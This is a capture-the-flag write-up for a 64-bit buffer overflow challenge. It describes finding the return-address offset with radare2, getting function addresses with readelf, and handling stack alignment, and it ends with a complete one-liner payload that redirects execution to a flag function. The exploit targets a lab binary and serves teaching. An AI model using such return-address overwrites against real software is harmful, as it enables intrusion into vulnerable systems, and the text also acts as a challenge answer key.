

Lets try moving to 64-bit, but don't worry we'll start easy. Overflow the buffer and change the return address to the flag function in this program. You can find it in /problems/newoverflow-1_3_e53f871ba121b62d35646880e2577f89 on the shell server. Source.


  1. Find the offset/padding

    1. You can use the method described in rop64 with the cyclic and cyclic_find or you can use the following

    2. Open vuln in radare2 with r2 ./vuln

    3. Run aaaa

    4. Run pdf @ sym.vuln to get var int local_40h @ rbp-0x40

    5. The 0x40 is the buffer location so 8 more bytes are needed to get past the "saved ebp register"

    6. So the offset is 0x40+8

  2. Run readelf -s vuln to get the address of main and flag.

  3. We can not offset and call the flag function directly because that would cause a stack misalignment in 64-bit. So instead we form out payload by doing padding + main_address + flag_address instead of just padding + flag_address as we would in 32-bit.

  4. We can use p64 from pwntools to convert the hex addresses to little endian.

  5. Payload complete: python2 -c "print 'A'*72 + '\xcb\x07@\x00\x00\x00\x00\x00' + 'g\x07@\x00\x00\x00\x00\x00'" | ./vuln



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